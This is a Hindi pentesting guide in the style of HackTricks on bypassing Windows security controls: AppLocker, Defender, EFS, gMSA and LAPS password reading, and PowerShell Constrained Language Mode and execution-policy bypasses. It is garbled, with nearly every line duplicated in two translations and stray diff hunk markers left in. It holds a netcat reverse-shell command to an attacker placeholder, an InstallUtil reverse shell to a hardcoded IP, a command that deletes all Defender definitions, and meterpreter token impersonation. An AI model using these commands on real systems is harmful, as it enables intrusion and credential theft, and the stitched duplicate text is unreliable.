* आमतौर पर **विश्वसनीय** [**"LOLBAS's"**](https://lolbas-project.github.io/) बाइनरीज़ भी AppLocker को बायपास करने के लिए उपयोगी हो सकती हैं।
* **खराब लिखे गए नियमों को भी बायपास किया जा सकता है**
* उदाहरण के लिए, **`<FilePathCondition Path="%OSDRIVE%*\allowed*"/>`**, आप कहीं भी **`allowed` नामक फोल्डर बना सकते हैं** और यह अनुमति दी जाएगी।
* संगठन अक्सर **`%System32%\WindowsPowerShell\v1.0\powershell.exe` एक्ीक्यूटेबल को ब्लॉक करने पर ध्यान केंद्रित करते हैं**, लेकिन अन्य [**PowerShell एक्जीक्यूटेबल स्थानों**](https://www.powershelladmin.com/wiki/PowerShell\_Executables\_File\_System\_Locations) जैसे `%SystemRoot%\SysWOW64\WindowsPowerShell\v1.0\powershell.exe` या `PowerShell_ISE.exe` के बारे में भूल जाते हैं।
* **DLL प्रवर्तन बहुत कम सक्षम किया जाता है** क्योंकि यह एक सिस्टम पर अतिरिक्त भार डाल सकता है, और यह सुनिश्चित करने के लिए कि कुछ भी टूटेगा नहीं, इसके लिए बहुत सारी परीक्षण की आवश्यकता होती है। इसलिए **DLLs का उपयोग बैकडोर के रूप में करने से AppLocker को बायपास करने में मदद मिलेगी**।
* आप [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) या [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) का उपयोग करके किसी भी प्रक्रिया में **Powershell** कोड को **निष्पादित कर सकते हैं** और AppLocker को बायपास कर सकते हैं। अधिक जानकारी के लिए देखें: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode)
## प्रमाणीकरण संग्रहण
### सुरक्षा खात प्रबंधक (SAM)
### सुरक्षा खात प्रबंधक (SAM)
स्थानीय प्रमाणीकरण इस फाइल में मौजूद होते हैं, पासवर्ड हैश किए जाते हैं।
स्थानीय प्रमाणीकरण इस फाइल में मौजूद हैं, पासवर्ड हैश किए गए हैं।
### स्थानीय सुरक्षा प्राधिकरण (LSA) - LSASS
**प्रमाणीकरण** (हैश किए गए) इस सबसिस्टम की **मेमोरी** में **सहेजे जाते हैं** एकल साइन-ऑन कारणों के लिए।\
**LSA** स्थानीय **सुरक्षा नीति** (पासवर्ड नीति, उपयोगकर्ता अनुमतियाँ...) का प्रशासन करता है, **प्रमाणीकरण**, **पहुँच टोकन**...\
LSA ही वह होगा जो **SAM** फ़ाइल में प्रदान किए गए प्रमाणीकरण की जांच करेगा (स्थानीय लॉगिन के लिए) और डोमेन उपयोगकर्ता की प्रमाणिति के लिए **डोमेन नियंत्रक** के साथ बातचीत करेगा।
**प्रमाणीकरण** (हैश) इस उपप्रणाली की **मेमोरी** में **सहेजे गए** हैं एकल साइन-ऑन कारणों के लिए।\
**LSA** स्थानीय **सुरक्षा नीति** (पासवर्ड नीति, उपयोगकर्ता अनुमतियाँ...), **प्रमाणीकरण**, **एक्सेस टोकन**... का प्रबंधन करता है।\
LSA वह होगा जो **SAM** फाइल के अंदर प्रदान किए गए प्रमाणीकरण की **जांच** करेगा (स्थानीय लॉगिन के लिए) और डोमेन उपयोगकर्ता को प्रमाणित करने के लिए **डोमेन कंट्रोलर** से **बात** करेगा।
**प्रमाणीकरण** **प्रक्रिया LSASS** में सहेजे जाते हैं: Kerberos टिकट, NT और LM हैश, आसानी से डिक्रिप्ट किए जा सकने वाले पासवर्ड।
**प्रमाणीकरण** **प्रक्रिया LSASS** के अंदर **सहेजे गए** हैं: Kerberos टिकट, हैश NT और LM, आसानी से डिक्रिप्ट किए गए पासवर्ड।
### LSA गुप्त
### LSA सीक्रेट्स
LSA डिस्क में कुछ प्रमाणीकरण सहेज सकता है:
LSA कुछ प्रमाणीकरण को डिस्क में सहेज सकता है:
* सक्रिय निर्देशिका के कंप्यूटर खाते का पासवर्ड (अप्राप्य डोमेन नियंत्रक)।
* एक्टिव डायरेक्टरी के कंप्यूटर खाते का पासवर्ड (पहुँच से बाहर डोमेन कंट्रोलर)।
* विंडोज सेवाओं के खातों के पासवर्ड
* निर्धारित कार्यों के लिए पासवर्ड
* अधिक (IIS अनुप्रयोगों का पासवर्ड...)
* और अधिक (IIS अनुप्रयोगों का पासवर्ड...)
### NTDS.dit
यह एक्टिव डायरेक्टरी का डेटाबेस है। यह केवल डोमेन नियंत्रकों में मौजूद होता है।
यह एक्टिव डायरेक्टरी का डेटाबेस है। यह केवल डोमेन कंट्रोलर्स में मौजूद है।
## रक्षक
## डिफेंड
[**माइक्रोसॉफ्ट रक्षक**](https://en.wikipedia.org/wiki/Microsoft\_Defender) विंडोज 10 और विंडोज 11 में उपलब्ध एक एंटीवायरस है, और विंडोज सर्वर के संस्करणों में भी है। यह **`WinPEAS`** जैसे सामान्य पेंटेस्टिंग उपकरणों को **ब्लॉक** करता है। हालांकि, इन सुरक्षा को दौरा करने के तरीके हैं।
[**Microsoft Defender**](https://en.wikipedia.org/wiki/Microsoft\_Defender) \*\*\*\* एक एंटीवायरस है जो Windows 10 और Windows 11 में, और Windows Server के संस्करणों में उपलब्ध है। यह **`WinPEAS`** जैसे सामान्य पेंटेस्टिंग टूल्स को **ब्लॉक** करता है। हालांकि, इन सुरक्षाओं को **बायपास करने के तरीके** हैं।
### जांच
रक्षक की **स्थिति** की जांच करने के लिए आप PS cmdlet **`Get-MpComputerStatus`** को निष्पादित कर सकते हैं (जानने के लिए **`RealTimeProtectionEnabled`** के मान की जांच करें कि क्या यह सक्रिय है):
**Defender** की **स्थिति** की जांच करने के लिए आप PS cmdlet **`Get-MpComputerStatus`** को निष्पादित कर सकते हैं (यह जानने के लिए कि यह सक्रिय है या नहीं, **`RealTimeProtectionEnabled`** के मान की जांच करें):
<pre class="language-powershell"><code class="lang-powershell">PS C:\> Get-MpComputerStatus
@ -107,7 +107,7 @@ NISEngineVersion : 0.0.0.0
PSComputerName :
</code></pre>
इसे जांचने के लिए आप यह भी चला सकते हैं:
इसे सूचीबद्ध करने के लिए आप यह भी चला सकते हैं:
```bash
WMIC /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /Format:List
wmic /namespace:\\root\securitycenter2 path antivirusproduct
@ -116,54 +116,60 @@ sc query windefend
#Delete all rules of Defender (useful for machines without internet access)
"C:\Program Files\Windows Defender\MpCmdRun.exe" -RemoveDefinitions -All
```
## EFS (एन्क्रिप्टेड फाइल सिस्टम)
## EFS (एन्क्रिप्टेड फाइल सिस्टम)
EFS एक फ़ाइल को बल्क **सममिति कुंजी** द्वारा एन्क्रिप्ट करके काम करता है, जिसे फ़ाइल एन्क्रिप्शन कुंजी या **FEK** के रूप में भी जाना जाता है। FEK फिर एक **सार्वजनिक कुंजी** के साथ **एन्क्रिप्ट** किया जाता है जो फ़ाइल को एन्क्रिप्ट करने वाले उपयोगकर्ता से जुड़ी होती है, और इस एन्क्रिप्टेड FEK को एन्क्रिप्टेड फ़ाइल के $EFS **वैकल्पिक डेटा स्ट्रीम** में संग्रहीत किया जाता है। फाइल को डिक्रिप्ट करने के लिए, EFS कंपोनेंट ड्राइवर $EFS स्ट्रीम में संग्रहीत सममिति कुंजी को डिक्रिप्ट करने के लिए EFS डिजिटल प्रमाणपत्र (फाइल को एन्क्रिप्ट करने के लिए उपयोग किया जाता है) के साथ मेल खाती प्रमाणपत्र का उपयोग करता है। [यहां से](https://en.wikipedia.org/wiki/Encrypting\_File\_System)।
EFS एक फाइल को एक **सममित कुंजी** से एन्क्रिप्ट करके काम करता है, जिसे फाइल एन्क्रिप्शन की, या **FEK** के नाम से जाना जाता है। FEK को फिर उस **सार्वजनिक कुंजी** से **एन्क्रिप्ट** किया जाता है जो उस उपयोगकर्ता से जुड़ी होती है जिसने फाइल को एन्क्रिप्ट किया है, और यह एन्क्रिप्टेड FEK को $EFS **वैकल्पिक डेटा स्ट्रीम** में संग्रहीत किया जाता है। फाइल को डिक्रिप्ट करने के लिए, EFS कंपोनेंट ड्राइवर $EFS स्ट्रीम में संग्रहीत सममित कुंजी को डिक्रिप्ट करने के लिए EFS डिजिटल प्रमाणपत्र (जिसका उपयोग फाइल को एन्क्रिप्ट करने के लिए किया गया था) से मेल खाने वाली **निजी कुंजी** का उपयोग करता है। [यहाँ](https://en.wikipedia.org/wiki/Encrypting_File_System) से
इस तरह के उदाहरण:
उदाहरण जब फाइलें बिना उपयोगकर्ता के अनुरोध के डिक्रिप्ट हो जाती हैं:
* फ़ाइलें और फ़ोल्डर FAT32 जैसे दूसरे फ़ाइल सिस्टम के साथ फॉर्मेट किए गए वॉल्यूम पर कॉपी होने से पहले डिक्रिप्ट की जाती हैं, जैसे [FAT32](https://en.wikipedia.org/wiki/File\_Allocation\_Table)
* एन्क्रिप्टेड फाइलें SMB/CIFS प्रोटोकॉल का उपयोग करके नेटवर्क के माध्यम से कॉपी की जाती हैं, फ़ाइलें नेटवर्क पर भेजने से पहले डिक्रिप्ट की जाती हैं।
* फाइलें और फोल्डर्स को [FAT32](https://en.wikipedia.org/wiki/File_Allocation_Table) जैसे अन्य फाइल सिस्टम के साथ फॉर्मेट किए गए वॉल्यूम में कॉपी करने से पहले डिक्रिप्ट किया जाता है
* एन्क्रिप्टेड फाइलें जब SMB/CIFS प्रोटोकॉल का उपयोग करके नेटवर्क पर कॉपी की जाती हैं, तो फाइलें नेटवर्क पर भेजे जाने से पहले डिक्रिप्ट की जाती हैं।
इस तरीके से एन्क्रिप्टेड फ़ाइलें **मालिक उपयोगकर्ता द्वारा पारदर्शी रूप से एक्सेस की जा सकती हैं** (जिन्होंने उन्हें एन्क्रिप्ट किया है), इसलिए अगर आप उस उपयोगकर्ता के रूप में बन सकते हैं तो आप फ़ाइलें डिक्रिप्ट कर सकते हैं (उपयोगकर्ता के पासवर्ड को बदलने और उसके रूप में लॉगिन करने से काम नहीं चलेगा)।
इस विधि से एन्क्रिप्टेड फाइलों को **मालिक उपयोगकर्ता द्वारा पारदर्शी रूप से एक्सेस किया जा सकता है** (जिसने उन्हें एन्क्रिप्ट किया है), इसलिए अगर आप **उस उपयोगकर्ता बन सकते हैं** तो आप फाइलों को डिक्रिप्ट कर सकते हैं (उपयोगकर्ता का पासवर्ड बदलना और उसके रूप में लॉगिन करना काम नहीं करेगा)।
### EFS जानकारी की जांच
### EFS जानकारी जांचें
जांचें कि क्या **उपयोगकर्ता** ने **इस सेवा का उपयोग किया** है, इस पथ की जांच करके: `C:\users\<username>\appdata\roaming\Microsoft\Protect`
यह जांचें कि क्या कोई **उपयोगकर्ता** ने इस **सेवा** का **उपयोग किया** है यह पथ मौजूद है या नहीं: `C:\users\<username>\appdata\roaming\Microsoft\Protect`
साइफर /c \<file>\ का उपयोग करके फ़ाइल के **पहुंच** वाले **उपयोगकर्ता** की जांच करें।
आप एक फ़ोल्डर में `cipher /e` और `cipher /d` का उपयोग करके सभी फाइलों को **एन्क्रिप्ट** और **डिक्रिप्ट** कर सकते हैं।
जांचें **किसके पास** फाइल तक **पहुंच** है cipher /c \<file>\
आप `cipher /e` और `cipher /d` का उपयोग भी ए फोल्ड के अंदर सभी फाइलों को **एन्क्रिप्ट** और **डिक्रिप्ट** करने के लिए कर सकते हैं।
### EFS फ़ाइलें डिक्रिप्ट करना
### EFS फाइलों को डिक्रिप्ट करना
#### Authority System होना
#### अधिकार प्रणाली होना
इस तरीके में **पीड़ित उपयोगकर्ता** को **होस्ट** में **चल रहे** एक **प्रक्रिया** की आवश्यकता होती है। यदि ऐसा है, तो `meterpreter` सत्र का उपयोग करके आप प्रक्रिया के उपयोगकर्ता के टोकन का अनुकरण कर सकते हैं (`incognito` के `impersonate_token` से)। या आप सीधे उपयोगकर्ता की प्रक्रिया में `migrate` कर सकते हैं।
इस तरीके की आवश्यकता है कि **पीड़ित उपयोगकर्ता** होस्ट के अंदर एक **प्रक्रिया** **चला** रहा हो। अगर ऐसा है, तो `meterpreter` सत्र का उपयोग करके आप उपयोगकर्ता की प्रक्रिया के टोकन की नकल कर सकते हैं (`impersonate_token` `incognito` से)। या आप सिर्फ उपयोगकर्ता की प्रक्रिया में `migrate` कर सकते हैं।
#### उपयोगकर्ता के पासवर्ड को जानना
#### उपयोगकर्ता का पासवर्ड जानना
{% embed url="https://github.com/gentilkiwi/mimikatz/wiki/howto-~-decrypt-EFS-files" %}
## समूह प्रबंधित सेवा खाता (gMSA)
## Group Managed Service Accounts (gMSA)
अधिकांश इंफ्रास्ट्रक्चर में, सेवा खाते "पासवर्ड कभी नहीं समाप्त होता" विकल्प के साथ आम उपयोगकर्ता खाते होते हैं। इन खातों का रखरखाव एक वास्तविक मुसीबत हो सकता है और इसीलिए माइक्रोसॉफ्ट ने **प्रबंधित सेवा खाते** पेश किए हैं:
अधिकांश इंफ्रास्ट्रक्चर में, सेवा खाते सामान्य उपयोगकर्ता खाते होते हैं जिनमें “**पासवर्ड कभी समाप्त नहीं होता**” विकल्प होता है। इन खातों का प्रबंधन एक वास्तविक समस्या हो सकती है और इसीलिए Microsoft ने **Managed Service Accounts** पेश किए:
* पासवर्ड प्रबंधन नहीं। इसमें एक जटिल, यादृच्छिक, 240-वर्णकार पासवर्ड का उपयोग किया जाता है और जब यह डोमेन या कंप्यूटर पासवर्ड समाप्ति तिथि तक पहुंचता है, तो यह स्वचालित रूप से बदल जाता है।
* इसका उपयोग करने के लिए माइक्रोसॉफ्ट की कुंजी वितरण सेवा (KDC) का उपयोग किया जाता है जो gMSA के लिए पासवर्ड बनाने और प्रबंधित करने के लिए होती है।
* यह लॉक नहीं हो सकता और इंटरैक्टिव लॉगिन के लिए उपयोग नहीं किया जा सकता है
* अब पासवर्ड प्रबंधन की जरूरत नहीं है। यह एक जटिल, यादृच्छिक, 240-अक्षर का पासवर्ड का उपयोग करता है और जब डोमेन या कंप्यूटर पासवर्ड समाप्ति तिथि तक पहुंचता है तो उसे स्वचालित रूप से बदल देता है।
* यह Microsoft Key Distribution Service (KDC) का उपयोग करके gMSA के लिए पासवर्ड बनाने और प्रबंधित करने के लिए करता है।
* इसे लॉक आउट नहीं किया जा सकता या इंटरएक्टिव लॉगिन के लिए उपयोग नहीं किया जा सकता
* कई होस्टों के बीच साझा करने का समर्थन करता है
* शेड्यूल कार्यों को चलाने के लिए उपयोग किया जा सकता है (प्रबंधित सेवा खाते शेड्यूल कार्यों को चलाने का समर्थन नहीं करते हैं)
* सरलीकृत SPN प्रबंधन - यदि कंप्यूटर के sAMaccount विवरण या DNS नाम गुण परिवर्तित होते हैं तो सिस्टम स्वचालित रूप से SPN मान को बदल देगा
* शेड्यूल किए गए कार्यों को चलाने के लिए उपयोग किया जा सकता है (Managed service accounts शेड्यूल किए गए कार्यों को चलाने का समर्थन नहीं करते)
* सरलीकृत SPN प्रबंधन सिस्टम स्वचालित रूप से SPN मान को बदल देगा अगर कंप्यूटर के **sAMaccount** विवरण या DNS नाम संपत्ति बदल जाती है
gMSA खातों के पासवर्ड एक LDAP गुण के रूप में संग्रहीत होते हैं जिसे _**msDS-ManagedPassword**_ कहा जाता है जो DC के द्वारा हर 30 दिन में स्वचालित रूप से रीसेट होते हैं, **अधिकृत प्रशासकों** और **सर्वरों** द्वारा प्राप्त किए जा सकते हैं जिन पर वे स
gMSA खातों के पासवर्ड _**msDS-ManagedPassword**_ नामक LDAP प्रॉपर्टी में संग्रहीत होते हैं जो DCs द्वारा हर 30 दिनों में **स्वचालित रूप से रीसेट** हो जाते हैं, **अधिकृत प्रशासकों** और उन सर्वरों द्वारा **प्राप्त किए जा सकते हैं** जिन पर वे स्थापित हैं। _**msDS-ManagedPassword**_ एक एन्क्रिप्टेड डेटा ब्लॉब है जिसे [MSDS-MANAGEDPASSWORD_BLOB](https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/a9019740-3d73-46ef-a9ae-3ea8eb86ac2e) कहा जाता है और यह केवल तभी प्राप्त किया जा सकता है जब कनेक्शन सुरक्षित हो, **LDAPS** या जब प्रमाणीकरण प्रकार 'Sealing & Secure' हो, उदाहरण के लिए।
![Image from https://cube0x0.github.io/Relaying-for-gMSA/](../.gitbook/assets/asd1.png)
तो, अगर gMSA का उपयोग किया जा रहा है, तो जांचें कि क्या इसमें **विशेष अधिकार** हैं और यह भी जांचें कि क्या आपके पास सेवाओं के पासवर्ड को **पढ़ने** की **अनुमति** है।
आप इस पासवर्ड को [**GMSAPasswordReader**](https://github.com/rvazarkar/GMSAPasswordReader) के साथ पढ़ सकते हैं:
```
/GMSAPasswordReader --AccountName jkohler
```
इस [वेब पेज](https://cube0x0.github.io/Relaying-for-gMSA/) की जांच करें जो बताती है कि **NTLM रिले हमला** कैसे करें और **gMSA** के **पासवर्ड** को **पढ़ें**
इस [वेब पेज](https://cube0x0.github.io/Relaying-for-gMSA/) को भी देखें जो बताता है कि कैसे **NTLM relay attack** का प्रयोग करके **gMSA** का **पासवर्ड** **पढ़ा** जा सकता है
## LAPS
\*\*\*\*[**Local Administrator Password Solution (LAPS)**](https://www.microsoft.com/en-us/download/details.aspx?id=46899) आपको डोमेन-जुडिंड कंप्यूटरों पर **स्थानीय व्यवस्थापक पासवर्ड** (जो **यादृच्छिक**, अद्वितीय और **नियमित रूप से बदलता है**) का प्रबंधन करने की अनुमति देता है। ये पासवर्ड सेंट्रली संग्रहीत होते हैं और ACLs का उपयोग करके अधिकृत उपयोगकर्ताओं को प्रतिबंधित किया जाता है। यदि आपको पर्याप्त अनुमतियाँ दी जाती हैं तो आप स्थानीय व्यवस्थापकों के पासवर्ड पढ़ सकते हैं।
[**Local Administrator Password Solution (LAPS)**](https://www.microsoft.com/en-us/download/details.aspx?id=46899) आपको डोमेन-जुड़े कंप्यूटरों पर स्थानीय एडमिनिस्ट्रेटर का पासवर्ड (**यादृच्छिक**, अद्वितीय और नियमित रूप से **बदला जाने वाला**) **प्रबंधित करने** की अनुमति देता है। ये पासवर्ड केंद्रीय रूप से Active Directory में संग्रहीत किए जाते हैं और ACLs का उपयोग करके अधिकृत उपयोगकर्ताओं तक सीमित होते हैं। यदि आपके उपयोगकर्ता को पर्याप्त अनुमतियां दी गई हैं तो आप स्थानीय एडमिन्स के पासवर्ड पढ़ सकते हैं।
{% content-ref url="active-directory-methodology/laps.md" %}
[laps.md](active-directory-methodology/laps.md)
@ -171,40 +177,34 @@ gMSA खातों के पासवर्ड एक LDAP गुण के
## PS Constrained Language Mode
PowerShell \*\*\*\* [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) **बहुत सारी सुविधाओं को बंद कर देता है** जो PowerShell को प्रभावी तरीके से उपयोग करने के लिए आवश्यक होती हैं, जैसे COM ऑब्जेक्ट्स को अवरुद्ध करना, स्वीकृत .NET प्रकारों को ही अनुमति देना, XAML-आधारित वर्कफ़्लो, PowerShell कक्षाएं, और अधिक।
PowerShell [**Constrained Language Mode**](https://devblogs.microsoft.com/powershell/powershell-constrained-language-mode/) कई ऐसी सुविधाओं को **सीमित कर देता है** जो PowerShell का प्रभावी ढंग से उपयोग करने के लिए आवश्यक हैं, जैसे कि COM ऑब्जेक्ट्स को ब्लॉक करना, केवल अनुमोदित .NET प्रकारों की अनुमति देना, XAML-आधारित वर्कफ्लोज़, PowerShell क्लासेस, और अधिक।
### **जांच करें**
### **जांचें**
```powershell
$ExecutionContext.SessionState.LanguageMode
#Values could be: FullLanguage or ConstrainedLanguage
```
### बापास
### बापास
```powershell
#Easy bypass
Powershell -version 2
```
वर्तमान Windows में यह Bypass काम नहीं करेगा, लेकिन आप [**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM) का उपयोग कर सकते हैं।\
**इसे कंपाइल करने के लिए आपको** **एक संदर्भ जोड़ने की आवश्यकता हो सकती है** -> _ब्राउज़_ -> _ब्राउज़_ -> `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` जोड़ें और **परियोजना को .Net4.5 में बदलें**।
वर्तमान Windows में वह Bypass काम नहीं करेगा लेकिन आप [**PSByPassCLM**](https://github.com/padovah4ck/PSByPassCLM) का उपयोग कर सकते हैं।\
**इसे कंपाइल करने के लिए आपको जरूरत पड़ सकती है** _**संदर्भ जोड़ें**_ -> _ब्राउज़ करें_ -> _ब्राउज़ करें_ -> `C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0\31bf3856ad364e35\System.Management.Automation.dll` जोड़ें और **प्रोजेक्ट को .Net4.5 में बदलें**।
#### सीधा Bypass:
#### सीधा बायपास:
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /U c:\temp\psby.exe
```
#### रिवर्स शेल:
```bash
nc -e /bin/sh <attacker_ip> <attacker_port>
```
यहां `<attacker_ip>` और `<attacker_port>` को आपके आक्रमक का IP पता और पोर्ट संख्या से बदलें।
```bash
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\InstallUtil.exe /logfile= /LogToConsole=true /revshell=true /rhost=10.10.13.206 /rport=443 /U c:\temp\psby.exe
```
आप [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) या [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) का उपयोग कर हैं ताकि आप किसी भी प्रक्रिया में **Powershell** कोड को निषिद्ध मोड को छोड़कर चला सकें। अधिक जानकारी के लिए देखें: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
आप [**ReflectivePick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) या [**SharpPick**](https://github.com/PowerShellEmpire/PowerTools/tree/master/PowerPick) का उपयोग करके किसी भी प्रक्रिया में **Powershell** कोड को निष्पादित कर सकते हैं और संयमित मोड को बायपास कर सकते हैं। अधिक जानकारी के लिए देखें: [https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode](https://hunter2.gitbook.io/darthsidious/defense-evasion/bypassing-applocker-and-powershell-contstrained-language-mode).
## PS Execution Policy
## PS निष्पादन नीति
इसे डिफ़ॉल्ट रूप से **restricted** पर सेट किया जाता है। इस नीति को छोड़ने के प्रमुख तरीके:
डिफ़ॉल्ट रूप से यह **प्रतिबंधित** पर सेट होती है। इस नीति को बायपास करने के मुख्य तरीके:
```powershell
1º Just copy and paste inside the interactive PS console
2º Read en Exec
@ -224,53 +224,55 @@ Powershell -command "Write-Host 'My voice is my passport, verify me.'"
9º Use EncodeCommand
$command = "Write-Host 'My voice is my passport, verify me.'" $bytes = [System.Text.Encoding]::Unicode.GetBytes($command) $encodedCommand = [Convert]::ToBase64String($bytes) powershell.exe -EncodedCommand $encodedCommand
```
अधिक जानकारी [यहाँ](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) मिल सकती है।
और जानकारी [यहाँ](https://blog.netspi.com/15-ways-to-bypass-the-powershell-execution-policy/) पाई जा सकती है।
## सुरक्षा समर्थन प्रदाता इंटरफेस (SSPI)
## सिक्योरिटी सपोर्ट प्रोवाइडर इंटरफेस (SSPI)
यह एपीआई उपयोगकर्ताओं को प्रमाणित करने के लिए उपयोग किया जा सकता है।
यह एक API है जिसका उपयोग उपयोगकर्ताओं को प्रमाणित करने के लिए किया जा सकता है।
SSPI उन दो मशीनों के लिए उपयुक्त प्रोटोकॉल खोजने के लिए जिम्मेदार होगा जो संवाद करना चाहते हैं। इसके लिए प्राथमिक विधि के रूप में केरबेरोस होता है। फिर SSPI यह निर्धारित करेगा कि कौन सा प्रमाणीकरण प्रोटोकॉल उपयोग किया जाएगा, इन प्रमाणीकरण प्रोटोकॉल को सुरक्षा समर्थन प्रदाता (SSP) कहा जाता है, इन्हें प्रत्येक Windows मशीन के भीतर एक DLL के रूप में स्थानांतरित किया जाता है और दोनों मशीनों को समर्थन करना चाहिए ताकि संवाद संभव हो सके
SSPI दो मशीनों के बीच संवाद करने के लिए उपयुक्त प्रोटोकॉल खोजने का काम करेगा। इसके लिए पसंदीदा विधि Kerberos है। फिर SSPI यह तय करेगा कि कौन सा प्रमाणीकरण प्रोटोकॉल इस्तेमाल किया जाएगा, इन प्रमाणीकरण प्रोटोकॉलों को सिक्योरिटी सपोर्ट प्रोवाइडर (SSP) कहा जाता है, ये प्रत्येक Windows मशीन के अंदर DLL के रूप में स्थित होते हैं और दोनों मशीनों को संवाद करने के लिए एक ही SSP का समर्थन करना चाहिए।
### मुख्य SSPs
* **केरबेरोस**: प्राथमिकता वाला
* **Kerberos**: पसंदीदा विधि
* %windir%\Windows\System32\kerberos.dll
* **NTLMv1** और **NTLMv2**: संगतता कारणों के लिए
* **NTLMv1** और **NTLMv2**: संगतता के लिए
* %windir%\Windows\System32\msv1\_0.dll
* **Digest**: वेब सर्वर और LDAP, MD5 हैश के रूप में पासवर्ड
* **Digest**: वेब सर्वर और LDAP, पासवर्ड MD5 हैश के रूप में
* %windir%\Windows\System32\Wdigest.dll
* **Schannel**: SSL और TLS
* %windir%\Windows\System32\Schannel.dll
* **Negotiate**: इसका उपयोग प्रोटोकॉल की वार्ता करने के लिए किया जाता है (केरबेरोस या NTLM, केरबेरोस डिफ़ॉल्ट होता है)
* **Negotiate**: इसका उपयोग प्रोटोकॉल (Kerberos या NTLM, Kerberos डिफ़ॉल्ट होने के नाते) को तय करने के लिए किया जाता है
* %windir%\Windows\System32\lsasrv.dll
#### वार्ता में कई विधियाँ या केवल एक प्रदान की जा सकती हैं
#### बातचीत में कई विधियाँ या केवल एक ही पेश की जा सकती है
## UAC - उपयोगकर्ता खाता नियंत्रण
## UAC - यूजर अकाउंट कंट्रोल
[उपयोगकर्ता खाता नियंत्रण (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) एक सुविधा है जो **उच्चतम गतिविधियों के लिए सहमति प्रदान करती है**
[यूजर अकाउंट कंट्रोल (UAC)](https://docs.microsoft.com/en-us/windows/security/identity-protection/user-account-control/how-user-account-control-works) एक ऐसी सुविधा है जो **उच्च स्तरीय गतिविधियों के लिए सहमति प्रॉम्प्ट** सक्षम करती है
{% content-ref url="windows-security-controls/uac-user-account-control.md" %}
[uac-user-account-control.md](windows-security-controls/uac-user-account-control.md)
{% endcontent-ref %}
<figure><img src="../.gitbook/assets/image (3) (1) (1).png" alt=""><figcaption></figcaption></figure>
<figure><img src="../.gitbook/assets/image (3) (1) (1) (1).png" alt=""><figcaption></figcaption></figure>
\
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करके आसानी से वर्कफ़्लो बनाएं और **स्वचालित करें**, जो दुनिया के **सबसे उन्नत** सामुदायिक उपकरणों द्वारा संचालित होते हैं।\
आज ही पहुच प्राप्त करें:
[**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) का उपयोग करके आसानी से **वर्कफ्लोज़ का निर्माण और ऑटोमेशन** करें, जो दुनिया के **सबसे उन्नत** समुदाय टूल्स द्वारा संचालित होते हैं।\
आज ही पहुच प्राप्त करें:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
<details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert) के साथ AWS हैकिंग सीखें शून्य से लेकर हीरो तक</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप चाहते हैं कि आपकी **कंपनी HackTricks में विज्ञापित** की जाए? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की अनुमति चाहिए? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष [**NFT**](https://opensea.io/collection/the-peass-family) संग्रह
* प्राप्त करें [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **ट्विटर** पर **फ़ॉलो** करें [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **अपने हैकिंग ट्रिक्स साझा करें, PRs सबमिट करके** [**hacktricks repo**](https://github.com/carlospolop/hacktricks) **और** [**hacktricks-cloud repo**](https://github.com/carlospolop/hacktricks-cloud) **को डाउनलोड करें।**
HackTricks का समर्थन करने के अन्य तरीके:
* यदि आप चाहते हैं कि आपकी **कंपनी का विज्ञापन HackTricks में दिखाई दे** या **HackTricks को PDF में डाउनलोड करें**, तो [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) देखें!
